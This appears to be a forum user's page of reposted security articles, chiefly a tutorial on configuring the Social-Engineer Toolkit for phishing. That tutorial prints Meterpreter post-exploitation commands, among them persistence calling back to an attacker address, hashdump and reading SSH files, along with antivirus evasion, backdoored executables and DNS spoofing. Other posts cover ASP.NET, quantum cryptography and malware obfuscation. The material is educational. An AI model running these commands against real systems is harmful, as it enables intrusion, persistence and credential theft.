Everything posted by Nytro

  1. [h=1]Phishing and Social Engineering Techniques 2.0[/h]
Ahmed Mohamed, May 22, 2013

This is the second part of the phishing and social engineering techniques series. In the first article, we discussed what phishing is, as well as the different types of phishing. We made a demo of a phishing attack using an email spoofing method to convince our victims to click on our links, and finally we had an overview of the Social Engineering Toolkit. Today we are going to talk in detail about the Social Engineering Toolkit configuration, which allows us to customize our configuration according to the attack scenario. Being familiar with the configuration options will give you a view of the full features of SET, so that these features can be used to launch attacks against our victims and convince them to provide the attacker with all the information that the attacker needs for a further attack.

What is social engineering? According to Wikipedia:

Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that the attack is often a mere step in a more complex fraud.

[h=1]Social-Engineer Toolkit[/h]
The Social-Engineer Toolkit (SET) was created and written by David Kennedy (ReL1K) and is an open-source Python-driven tool that focuses solely on attacking the weakest link in the information security chain —the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test. The Social-Engineer Toolkit (SET) is included in the latest version of the most popular Linux distribution focused on security— BackTrack. It can also be downloaded through GitHub using the following command:

git clone https://github.com/trustedsec/social-engineer-toolkit/
[h=1]Social Engineering Toolkit Update[/h]
The first step that we should take after installing BackTrack is updating the Social Engineering Toolkit. To do so, open the terminal and change directory to the SET directory, then enter the following command:

root@bt:/pentest/exploits/set# svn update
D config/set_config.py
U config/set_config
U config/update_config.py
U setup.py
A src/fasttrack/delldrac.py
U src/fasttrack/mssql.py
U src/powershell/powershell.py
U src/core/set.py
U src/core/payloadgen/create_payloads.py
U src/core/setcore.py
U src/core/dictionaries.py
U src/core/menu/text.py
U src/core/fasttrack.py
U src/html/spawn.py
U src/html/Signed_Update.jar.orig
U src/html/unsigned/verified_sign.py
U src/html/unsigned/unsigned.jar
D src/webattack/java_applet
U src/webattack/multi_attack/multiattack.py
U src/webattack/harvester/scraper.py
U src/webattack/harvester/harvester.py
U src/webattack/browser_exploits/gen_payload.py
D src/webattack/web_clone/linux
D src/webattack/web_clone/osx
A src/webattack/web_clone/applet.txt
A src/webattack/web_clone/applet.database.old
U src/webattack/web_clone/applet.database
U src/payloads/set_payloads/shell.windows
A src/payloads/set_payloads/pyinjector.binary
U src/payloads/set_payloads/listener.py
U set
U readme/CHANGES
U readme/CREDITS
U readme/README
Updated to revision 1599.

[h=1]Social Engineering Toolkit configuration[/h]
The power of SET is in its configuration file. SET using its default settings works perfectly for most users, but advanced customization will help us make sure that the attack vectors run without problems. So after updating SET, it's time to edit the SET configuration file. Let's walk through it. To open the SET configuration file, open the terminal and change the directory to the config folder under the SET directory, where you will find the configuration file called set_config. Open it in any text editor.
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit/msf3

While looking through the configuration file, you can change any option to get the desired result. In the first option, you can change the path of where Metasploit is located. SET uses Metasploit for the payload creation, file format bugs, and for the browser exploit scenarios. By default, the Metasploit location is /opt/metasploit/msf3.

### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
METASPLOIT_DATABASE=postgresql

In this option, you can choose which database Metasploit will use. By default, PostgreSQL is the database.

### How many times SET should encode a payload if you are using standard MetaSploit encoding options
ENCOUNT=4

In this option, you can specify how many times Metasploit should encode the payload using the standard Metasploit encoding option. By default, it encodes four times before sending the payload.

### The browser, however can introduce buggy results when auto migrating.
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
AUTO_MIGRATE=OFF

In this option, you can set the auto_migrate option to ON/OFF. ON means that the Meterpreter session will migrate to a different process. For example, if we got a Meterpreter session through a browser attack and the victim closed the browser, then the session would be dead. But if auto_migrate is set to ON, the Meterpreter session will migrate to another running process, so if the attacker closes the browser, the session is still live.

### Custom exe you want to use for Metasploit encoding, this usually has better av
### detection. Currently it is set to legit.binary which is just calc.exe. An example
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary

In this option, you can determine which executable will be used for Metasploit encoding. By default, it's set to legit.binary, which is calc.exe.

### This is for the backdoored executable if you want to keep the executable to still work. Normally
### when legit.binary is used, it will render the application useless. Specifying this will keep the
### application working
BACKDOOR_EXECUTION=ON

In the next option we determine if we want to keep the executable working. We specify this at custom_exe, which by default is calc.exe.

### Here we can run multiple Meterpreter scripts once a session is active. This
### may be important if we are sleeping and need to run persistence, try to elevate
### permissions and other tasks in an automated fashion. First turn this trigger on
### then configure the flags. Note that you need to separate the commands by a ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF

Here, we can run multiple Meterpreter scripts once a session is active. We can turn it OFF/ON here and specify these scripts in the next option.

### What commands do you want to run once a Meterpreter session has been established.
### Be sure if you want multiple commands to separate with a ;. For example you could do
### run getsystem;run hashdump;run persistence to run three different commands
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts

In this option, we can choose which commands will be run once a Meterpreter session has been established. If you want multiple commands, you can separate them with a semicolon ";".

### This is the port that is used for the iFrame injection using the Metasploit browser attacks.
### By default this port is 8080 however egress filtering may block this. May want to adjust to
### something like 21 or 53
METASPLOIT_IFRAME_PORT=8080

You can use this to determine which port will be used for the iFrame injection while using the Metasploit browser attacks. By default, it will use port 8080. It's better to change it to a popular port like 21 or 53.

### Define to use Ettercap or not when using website attack only - set to ON and OFF
ETTERCAP=OFF
### Ettercap home directory (needed for DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
ETTERCAP_INTERFACE=eth0

Ettercap is a free and open source network security tool for man-in-the-middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. The Ettercap options can be used when an attacker is on the same subnet as his victims and he wants to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server. There are three options for Ettercap. The first is used to allow SET to use Ettercap, the second sets the path, and the third identifies the interface on which Ettercap will listen.

### Define to use dsniff or not when using website attack only - set to on and off
### If dsniff is set to on, ettercap will automatically be disabled.
DSNIFF=OFF

Dsniff is a set of password sniffing and network traffic analysis tools written by security researcher and startup founder Dug Song to parse different application protocols and extract relevant information. Dsniff passively monitors a network for interesting data (passwords, e-mail, files, etc.). In this option, you can allow the use of dsniff by setting it ON/OFF, but keep in mind that Ettercap will automatically be disabled.

### SendMail ON or OFF for spoofing email addresses
SENDMAIL=OFF

Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over the Internet. By setting the sendmail flag to ON, Sendmail can spoof source email addresses. Sendmail must be installed before setting it to ON. It's installed by default in BackTrack 5.

### Create self-signed Java applets and spoof publisher note this requires you to
### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

If we set this option to ON, it will allow us to sign the Java applet with whatever name we want. For example, if we are targeting a company called "XYZ", you can sign the Java applet with "XYZ" to make it look more believable. By default the Java applet is signed by Microsoft; this will require you to install Java's JDK.

### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=OFF
### Path to the Apache web root
APACHE_DIRECTORY=/var/www

If we set this option to ON, SET will use the Apache web server to handle the web requests, because it will increase the speed of the attack. By default SET will use the Python web server. You should also set the Apache root directory —which is /var/www by default.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
SELF_SIGNED_CERT=OFF
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem

If you are targeting a website that uses the "HTTPS" protocol for communication, it's better to make your website use "HTTPS" too. Fortunately SET allows you to incorporate SSL-based attacks with it, so you will need to turn webattack_ssl to ON. Set the second option to ON if you want to use self-signed certificates, and the third and fourth options should refer to the location of the client and server certificates.

[h=1]Conclusion[/h]
The Social Engineering Toolkit is a powerful tool that the penetration tester can use against his victims to convince them to provide him with the required information for a further attack. SET has many features that you can customize to help you with your attack scenario.

[h=1]References[/h]
www.wikipedia.com
www.social-engineer.org

Source: InfoSec Institute Resources – Phishing and Social Engineering Techniques 2.0
  2. The ASP.NET Internals
Dejan Lukan, May 23, 2013

ASP.NET Configuration Options

The most important configurations in the web.config file will be described in this section:

<authentication>

The authentication tag is used at the application level and is used to identify the client. There are four authentication modes we can choose from when setting this element: None, Windows, Forms, Passport. If we don't need any authentication, we can simply set the authentication mode to None. We can also use the Windows authentication mode if we would like IIS to handle the authentication for us; in a usual scenario, the authentication credentials are sent to the IIS server, whose job is to check their validity and respond appropriately. IIS gives us four standard authentication options that we can use: Anonymous, Basic, Digest and Windows integrated. Forms uses web application forms to collect the user-supplied username and password and validate them. With Passport authentication, we're actually authenticating against Microsoft's Passport database, which is good because users don't need to constantly re-register on various sites, but it costs a bit of money to use. Let's take a look at the authentication tag as used by the default application, which can be created by Visual Studio:

<authentication mode="Forms">
    <forms loginUrl="~/Account/Login.aspx" timeout="2880" />
</authentication>

We can see that we need to log in with the Forms authentication mode if we're trying to access the Account/Login.aspx page. This can be seen in the picture below, where we can clearly see that we need to input the right username and password to successfully authenticate:

<authorization>

The next important field is <authorization>, which controls the clients' access to the resources in the same directory. Inside this element, we can use either <allow> or <deny> elements, where both of them can be used to allow/deny access to users and resources. We can use different attributes with those two elements to give/deny the exact group of users certain permissions. The attributes are the following:

- users: we can use a list of user names which we allow/deny access to certain resources, but there are also two other characters that have a special meaning. The ? character can be used to specify anonymous users, while all users are specified with the * character.
- roles: we can specify a list of roles which are allowed/denied access to a certain resource.
- verbs: we can specify a list of HTTP methods to which access is allowed/denied.

Let's take a look at the default Visual Studio application's Account/ directory that contains the following web.config configuration file:

<?xml version="1.0"?>
<configuration>
    <location path="Register.aspx">
        <system.web>
            <authorization>
                <allow users="*"/>
            </authorization>
        </system.web>
    </location>
    <system.web>
        <authorization>
            <deny users="?"/>
        </authorization>
    </system.web>
</configuration>

In the above configuration, we're specifying that all users are allowed access to the Register.aspx resource, while by default anonymous users are not allowed to access anything else.

<compilation>

The compilation element is used to define the compiler settings. There are a number of attributes that we can use with the compilation element, but the following are the most useful:

- debug: specifies if the debugging information should be printed to the web browser.
- defaultLanguage: specifies which language the application was written in.
- targetFramework: specifies the ASP.NET target framework which is used to compile the application.

Let's take a look at the default Visual Studio application that contains the following <compilation> settings:

<compilation debug="true" targetFramework="4.0" />

We've asked the application to print debugging information and told it that it was compiled for the 4.0 ASP.NET target framework. We can also see this information in the project's properties under the Application > Target framework setting.

ScriptResource and WebResource

From Microsoft ASP.NET 2.0, we can embed static files, like HTML files, CSS files, image files and scripts, in an assembly as .resources. But then we need a handle to access those resources, which is exactly what WebResource.axd provides. This is why the WebResource.axd file is used to retrieve assembly resources and send them as a response to the request in a web browser. When we send a request to WebResource.axd, the handler will look up the web resource identifier and try to load the assembly that contains the resource. If successful, it will get the data from the .resource assembly and send it to the client. The URL for WebResource.axd looks like this:

WebResource.axd?d=<encrypted_id>&t=<time_stamp>

The d parameter is used as an ID to request the resource we want, while the t parameter is the time stamp that is used to check whether the resource has changed since it was last requested. The question arises: why would we even want to use WebResource.axd, when we can simply serve static files normally? The answer is that we can deploy web applications easier and faster because we need to deploy a smaller number of files, not to mention that we need to maintain them. Let's take a look at the current default Visual Studio application's files as they appear in the Solution Explorer; this can be seen in the picture below:

We can see that we're using a number of static files like the jquery.js files, as well as the Site.css style sheet. To use WebResource.axd instead, we need to create a new directory called Resources/ at the document root of the web application (actually we can name the folder anything we want, but let's just name it Resources as advised). Right click on the project and select Add New Folder and name the folder Resources. The project tree will now look like presented in the picture below:

Notice that the Resources folder has been added to the list. After that, we need to add some static files to the Resources directory. We can do that by simply dragging and dropping; we'll drag each jquery.js script as well as the Site.css file to the newly created Resources directory. After that, the Scripts and Styles directories are not needed anymore and we can delete them. The new project's tree structure now looks like this:

If we try to reload the web page now, it shouldn't load correctly, since we moved the CSS style sheet file. In the picture below, we can see that this is indeed true, because the CSS style sheet wasn't read by the website, since it's not available in the previous location anymore:

If we look at the source code of the web page, we can see that it's trying to access the Styles/Site.css CSS file, but obviously it can't, since the web page doesn't have any style applied to it. But let's nevertheless try to access that file to check whether it's available or not. In the picture below, we can clearly see that the Site.css file is unreachable.

So we just proved that if we move the Site.css style sheet file to some other directory, the application won't find it and the web page will not be able to load it; this isn't exactly something new or hard to understand, but we're doing it because we want to make the point that if we remove Site.css now, the site won't be able to use it, but we'll later add it back by using WebResource.axd, and that's when the site should look like it did at the beginning, with the style sheet applied.

So the first thing we need to do is to prepare the web resources that we've just added to the Resources directory. We need to select all of the files in there and right-click on them, then select Properties. The following window should open:

Clearly we can see that the Build Action is the setting we need to change. Notice at the bottom of the picture where it says that the Build Action option specifies how the file should be built and deployed. Currently the field holds the value Content, because each file we selected has this option set; remember that the files are loaded normally now, by linking to them in the HTML as follows:

<link href="Styles/Site.css" rel="stylesheet" type="text/css" />

We need to change the Build Action to "Embedded Resource", as can be seen in the picture below:

Next, we need to register the resources as WebResource; we can do that with the WebResource attribute. We can place it in any .cs file, but it wouldn't be very good if we had web resources registered in various places. For this reason, it's best to register all files in the Properties/AssemblyInfo.cs file by using the WebResource attribute. The syntax for registering resources as WebResource in any .cs file is as follows:

[assembly: WebResource("webresource_name", "content_type")]

The webresource_name is the name of the resource that we're trying to embed in the assembly. The content_type is the MIME type of the resource. First we need to put the following line at the top of AssemblyInfo.cs to enable the use of WebResource:

using System.Web.UI;

After that, we can register the resources normally with WebResource. To register all previously moved static files we can write something like the following code and add it at the end of the AssemblyInfo.cs file:

/*
 * Web Resources
 */
[assembly: WebResource("WebApplication1.Resources.Site.css", "text/css")]
[assembly: WebResource("WebApplication1.Resources.jquery-1.4.1-vsdoc.js", "text/javascript")]
[assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.js", "text/javascript")]
[assembly: WebResource("WebApplication1.Resources.jquery-1.4.1.min.js", "text/javascript")]

Notice that the name of each resource is composed of the project name, which is WebApplication1, followed by the folder name Resources where they are located, followed by the actual name of each resource. The second argument is the MIME type of each resource that is sent as a Content-Type HTTP header in a response and may be used by the web browser in various ways. We used the "text/css" MIME type for style sheets, while the JavaScript files use the "text/javascript" MIME type.

We've just registered our added resources as web resources, but we still have to get the URL of each resource to be able to access them. We already said that before, the web page used the following code to request the resource, which is then downloaded and applied to the web page:

<link href="Styles/Site.css" rel="stylesheet" type="text/css" />

This wouldn't work now, however, since the resources have been relocated to some other file and it's not defined as a Content resource anymore, but as an EmbeddedResource. This is why we need to access it differently, with the use of the WebResource.axd script that accepts the d parameter, which is the ID of the resource we would like to access. But how do we get the value of the d parameter, which is needed to access the resource? This can be done by calling the GetWebResourceUrl function that accepts two arguments: the first argument specifies the type of the server-side resource and the second a resource name. To use this method, we must first get the instance of the ClientScriptManager class to which the function belongs. We can put that in the Default.aspx.cs file, which can then look like this:

using System;
using System.Diagnostics;
using System.Reflection;
using System.Web.UI;
using System.Web.UI.HtmlControls;

namespace WebApplication1
{
    public partial class _Default : System.Web.UI.Page
    {
        // Runs automatically at the Init stage when AutoEventWireup is enabled (the default).
        void Page_Init(object sender, EventArgs e)
        {
            ClientScriptManager cs = Page.ClientScript;

            // Build a <link> element whose href is the WebResource.axd URL of the embedded CSS.
            HtmlLink myHtmlLink = new HtmlLink();
            myHtmlLink.Href = cs.GetWebResourceUrl(typeof(SiteMaster), "WebApplication1.Resources.Site.css");
            cs.RegisterClientScriptResource(typeof(SiteMaster), "WebApplication1.Resources.Site.css");
            myHtmlLink.Attributes.Add("rel", "stylesheet");
            Page.Header.Controls.Add(myHtmlLink);

            // List every resource embedded in the assembly to verify the registration worked.
            string[] resourceNames = Assembly.GetExecutingAssembly().GetManifestResourceNames();
            foreach (string res in resourceNames)
            {
                Debug.WriteLine("Resource name: " + res);
            }
        }
    }
}

We loaded the "WebApplication1.Resources.Site.css" CSS resource and added it to the header of the web page. At the end of the function, we're also printing all the resources to verify that they got loaded successfully. If we run the application now, we should see that the CSS file is indeed loaded and working. We've just used WebResource.axd to get access to our CSS resource file; we won't repeat the steps for the JavaScript files, because they are essentially the same.

If there are any problems loading the resource files, we can download Reflector, which is accessible here: .NET Reflector - Understand and debug any .NET code, and look inside the generated DLL files located in the bin/ directory of the application. The .NET Reflector looks like the picture below:

If we look at WebApplication1, we can clearly see that the path to the resources is correct, as can also be seen in the picture below:

If the resources are still not loaded correctly, there's a nice tip here: asp.net - WebResource Hell - resource cannot be found - Stack Overflow. It suggests that we should call the GetWebResourceUrl function with the type of our .master file. In our case, the master file contains the class SiteMaster, which we should use as the first parameter to the GetWebResourceUrl function. After that, everything should work just fine. Let's verify that the CSS files have indeed been loaded successfully. In the picture below we can see that we've accessed the CSS file through WebResource.axd and that the CSS is actually visible and being read correctly.

We can see that we can successfully get our hands on the resources using WebResource.axd, which is located at the document root, according to the URIs in the source of the web page. However, there isn't actually a WebResource.axd file in the document root of the application; this is because .axd files are implemented as HTTP handlers, so they don't exist as an ASP.NET web page. If we look at the web.config configuration file accessible in the C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\Config directory, we can see the following, which directly relates to our WebResource.axd handler:

<add path="WebResource.axd" verb="GET" type="System.Web.Handlers.AssemblyResourceLoader" validate="True" />

If a request comes to WebResource.axd, the AssemblyResourceLoader HTTP handler is used to handle the request. This fully explains that the WebResource.axd file is just an HTTP handler implemented by the .NET framework to take requests and return the resources from the assembled files.

Conclusion

We've seen how we can embed static files inside the compiled assembly file, which enabled us to have every static resource available in a single file. This was a more complete introduction to WebResource.axd and ASP.NET, and this is the basis for understanding the Oracle Padding attack.

Source: InfoSec Institute Resources – The ASP.NET Internals
  3. Advanced Cryptography
Description: In this video Bill Buchanan talks about Advanced Cryptography, covering topics like Fundamentals of Crypto, Encryption, Private Key, Passing Keys, Public Key, Private Key for ID, PKI, Hashing, One Time Password, MAC, Secure Functions, etc. He covers almost all popular encryption methods.

Download codes, PDF and tools: http://www.asecuritysite.com/Encryption

Source: Advanced Cryptography
  4. Dynamic Malware Analysis
Description: In this video you will learn how to perform Dynamic Malware Analysis using the OllyDbg tool. Dynamic malware analysis is a very risky task because you are running that piece of malware on your system and checking what exactly that malware is doing, and after that you start analysing the processes and connections for evidence or other use. In this video he is running a Zeus botnet.

Source: Dynamic Malware Analysis
  5. Mimimorphism: A New Approach to Binary Code Obfuscation
Zhenyu Wu, Steven Gianvecchio, Mengjun Xie, and Haining Wang

Abstract

Binary obfuscation plays an essential role in evading malware static analysis and detection. The widely used code obfuscation techniques, such as polymorphism and metamorphism, focus on evading syntax-based detection. However, statistical test and semantic analysis techniques have been developed to thwart their evasion attempts. More recent binary obfuscation techniques are divided in their purposes of attacking either the statistical or the semantic approach, but not both. In this paper, we introduce mimimorphism, a novel binary obfuscation technique with the potential of evading both statistical and semantic detections. Mimimorphic malware uses instruction-syntax-aware high-order mimic functions to transform its binary into mimicry executables that exhibit high similarity to benign programs in terms of statistical properties and semantic characteristics. We implement a prototype of the mimimorphic engine on the Intel x86 platform, and evaluate its capability of evading statistical anomaly detection and semantic analysis detection techniques. Our experimental results demonstrate that the mimicry executables are indistinguishable from benign programs in terms of byte frequency distribution and entropy, as well as control flow fingerprint.

Full paper (387 KB) appeared in Proceedings of the 17th ACM Conference on Computer and Communications Security (CCS'10).
http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/Mimimorphic.pdf

Download presentation slides (for PowerPoint 2007+, 1.12 MB)
http://www.cs.wm.edu/~adamwu/Mimimorphism_CCS10/ZhenyuWu_CCS2010_Mimimorphism.pptx

Experimental data
7th order 100 mimimorphic instances (bz2 tar package, 127 MB)
http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder7.tar.bz2
8th order 100 mimimorphic instances (bz2 tar package, 169 MB)
http://www.cs.wm.edu/~hnw/Mimimorphic/MimicOrder8.tar.bz2

Note: These mimimorphic instances are NOT standalone executables. They are the mimimorphic payloads, which consist of sequences of mimicry instructions that encode a piece of randomized data. In a standalone mimimorphic executable, if we were to make one, each piece of payload would be merged with the decoder binary and put into the ".text" section of the executable.

Maintained by: Zhenyu Wu
Last modified: Mon Apr 30 18:16:22 EDT 2012

Source: Mimimorphism: A New Approach to Binary Code Obfuscation
  6. [h=2]Cryptography[/h] [h=3]The solace of quantum[/h][h=1]Eavesdropping on secret communications is about to get harder[/h] May 25th 2013 CRYPTOGRAPHY is an arms race between Alice and Bob, and Eve. These are the names cryptographers give to two people who are trying to communicate privily, and to a third who is trying to intercept and decrypt their conversation. Currently, Alice and Bob are ahead—just. But Eve is catching up. Alice and Bob are therefore looking for a whole new way of keeping things secret. And they may soon have one, courtesy of quantum mechanics. At the moment cryptography concentrates on making the decrypting part as hard as possible. The industry standard, known as RSA (after its inventors, Ron Rivest, Adi Shamir and Leonard Adleman, of the Massachusetts Institute of Technology), relies on two keys, one public and one private. These keys are very big numbers, each of which is derived from the product of the same two prime numbers. Anyone can encrypt a message using the public key, but only someone with the private key can decrypt it. To find the private key, you have to work out what the primes are from the public key. Make the primes big enough—and hunting big primes is something of a sport among mathematicians—and the task of factorising the public key to reveal the primes, though possible in theory, would take too long in practice. (About 40 quadrillion years with the primes then available, when the system was introduced in 1977.) Since the 1970s, though, the computers that do the factorisation have got bigger and faster. Some cryptographers therefore fear for the future of RSA. Hence the interest in quantum cryptography. Alice, Bob and Werner, too? The most developed form of quantum cryptography, known as quantum key distribution (QKD), relies on stopping interception, rather than preventing decryption. Once again, the key is a huge number—one with hundreds of digits, if expressed in the decimal system. 
Alice sends this to Bob as a series of photons (the particles of light) before she sends the encrypted message. For Eve to read this transmission, and thus obtain the key, she must intercept and measure some of the photons, which destroys them. Since Bob will certainly notice the missing photons, Eve will need to create and send replacements to avoid detection. But Alice and Bob (or, rather, the engineers who make their equipment) can frustrate that by encoding the ones and zeros of the key in one of two incompatible ways, chosen at random for each photon, such as two different polarisation bases. By Werner Heisenberg's Uncertainty Principle a photon cannot be measured in both ways at once, and because Eve does not know which encoding Alice chose, she measures some photons the wrong way and re-sends them in the wrong state, introducing errors. If Bob detects such errors when he and Alice compare a sample of the key over an open channel, he can tell Alice not to send the actual message until the line has been secured. One exponent of this approach is ID Quantique, a Swiss firm. In collaboration with Battelle, an American one, it is building a 700km (440-mile) fibre-optic QKD link between Battelle's headquarters in Columbus, Ohio, and the firm's facilities in and around Washington, DC. Battelle will use this to protect its own information and the link will also be hired to other firms that want to move sensitive data around. QuintessenceLabs, an Australian firm, has a different approach to encoding. Instead of tinkering with photons' polarisations, it changes their phases and amplitudes. The effect is the same, though: Eve will necessarily give herself away if she eavesdrops. Using this technology, QuintessenceLabs is building a 560km QKD link between the Jet Propulsion Laboratory in Pasadena, California, which organises many of NASA's unmanned scientific missions, and the Ames Research Centre in Silicon Valley, where a lot of the agency's scientific investigations are carried out.
A third project, organised by Jane Nordholt of Los Alamos National Laboratory, has just demonstrated how a pocket-sized QKD transmitter called the QKarD can secure signals sent over public data networks to control smart electricity grids. Smart grids balance demand and supply so that electricity can be distributed more efficiently. This requires constant monitoring of the voltage, current and frequency of the grid in lots of different places—and the rapid transmission of the results to control centres. That transmission, however, also needs to be secure in case someone malicious wants to bring the system down. In their different ways, all these projects are ambitious. All, though, rely on local fixed lines to carry the photons. Other groups of researchers are thinking more globally. To do that means sending quantum-secured data to and from satellites. At least three groups are working on this: Thomas Jennewein and his team at the Institute for Quantum Computing in Waterloo, Canada; a collaboration led by Anton Zeilinger at the University of Vienna and Jian-Wei Pan at the University of Science and Technology of China; and Alex Ling and Artur Ekert at the Centre for Quantum Technologies in Singapore. Dr Jennewein’s proposal is for Alice to beam polarisation-encoded photons to a satellite. Once she has established a key, Bob, on another continent, will wait until the satellite passes over him so he can send some more photons to it to create a second key. The satellite will then mix the keys together and transmit the result to Bob, who can work out the first key because he has the second. Alice and Bob now possess a shared key, so they can communicate securely by normal (less intellectually exhausting) terrestrial networks. Dr Jennewein plans to test the idea, using an aircraft rather than a satellite, at some point during the next 12 months. An alternative, but more involved, satellite method is to use entangled photon pairs. 
Both Dr Zeilinger's and Dr Ling's teams have been trying this. Entanglement is a quantum effect that connects photons intimately, even when they are separated by a large distance. Measure one particle and you know the state of its partner. In this way Alice and Bob can share a key made of entangled photon pairs generated on a satellite. Dr Zeilinger hopes to try this with a QKD transmitter based on the International Space Station. He and his team have been experimenting with entanglement at ground level for several years. In 2007 they sent entangled photon pairs 144km through the air across the Canary Islands. Dr Ling's device will test entanglement in orbit, but not send photons down to Earth. If this sort of thing works at scale, it should keep Alice and Bob ahead for years. As for poor Eve, she will find herself entangled in an unbreakable quantum web. Source: Cryptography: The solace of quantum | The Economist
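The protocol the article sketches (two incompatible encodings, Eve forced to guess, errors revealed by comparing a sample of the key) is BB84. The following is an added, classical simulation of it written for this page; it is not code from The Economist or from any of the firms or labs named above. The quantum rules are reduced to the two that matter (assumptions of the model): a photon prepared in one of two encodings yields its bit only when measured in the same encoding, and measuring it in the other encoding gives a random answer and re-prepares the photon in that encoding. Under intercept-resend, Eve guesses wrong half the time, and each wrong guess gives Bob a wrong bit half the time, so she shows up as roughly 25% errors in the sifted key.

```python
"""
BB84 quantum key distribution, simulated classically. Added illustration for
the article above; not code from The Economist, ID Quantique, QuintessenceLabs
or Los Alamos. Model assumptions: a photon is (bit, basis); measuring in the
preparation basis returns the bit, measuring in the other basis returns a
random bit and leaves the photon re-prepared in the measuring basis.
"""
import random


def measure(photon, basis, rng):
    """Measure a (bit, basis) photon in `basis`. Returns (result, photon_after)."""
    bit, prep_basis = photon
    if basis == prep_basis:
        return bit, photon
    new_bit = rng.getrandbits(1)          # wrong basis: random outcome, state disturbed
    return new_bit, (new_bit, basis)


def bb84(n, eve_present, rng):
    """Run one key exchange over n photons. Returns (qber, alice_key, bob_key)."""
    alice_bits = [rng.getrandbits(1) for _ in range(n)]
    alice_bases = [rng.getrandbits(1) for _ in range(n)]
    bob_bases = [rng.getrandbits(1) for _ in range(n)]
    bob_bits = []
    for bit, a_basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        photon = (bit, a_basis)
        if eve_present:
            # Intercept-resend: Eve must guess a basis, measure, and forward a
            # replacement photon so Bob does not see a gap in the stream.
            _, photon = measure(photon, rng.getrandbits(1), rng)
        result, _ = measure(photon, b_basis, rng)
        bob_bits.append(result)
    # Sifting over the open channel: keep only positions where both chose the same basis.
    sifted = [i for i in range(n) if alice_bases[i] == bob_bases[i]]
    # Sacrifice half the sifted bits, compared in the open, to estimate the error rate.
    sample, keep = sifted[::2], sifted[1::2]
    errors = sum(alice_bits[i] != bob_bits[i] for i in sample)
    qber = errors / len(sample) if sample else 0.0
    return qber, [alice_bits[i] for i in keep], [bob_bits[i] for i in keep]


def eavesdropper_detected(qber, threshold=0.11):
    """Abort when the error rate exceeds the threshold. 11% is the commonly
    quoted bound for BB84 with one-way post-processing (assumption: fixed here
    for illustration; a deployed system derives it from its channel's own noise)."""
    return qber > threshold


def run(n=4000, eve_present=False, seed=7):
    """Seeded convenience wrapper so a run is reproducible."""
    return bb84(n, eve_present, random.Random(seed))
```

The check that matters operationally is the sample comparison: without it the key would look fine to Bob even with Eve present, because he cannot tell a wrong bit from a right one on his own. Real links also see errors from detector noise and loss, which is why the threshold is set per channel rather than at zero.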
  7. [h=2]NoSuchCon’13 and crashing Windows with two instructions[/h]The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! The location, venue and speaker line-up were all amazing, with lots of free beer and a wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference. Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject: Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and it touched on several different exploitation techniques, internal CPU-related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered over the last several weeks and months. While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting it here anyway, in case you haven’t had a chance to take a look yet. In fact, the majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-) Download Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF) KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information” I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the others. A brief description of each technique and vulnerability follows below.
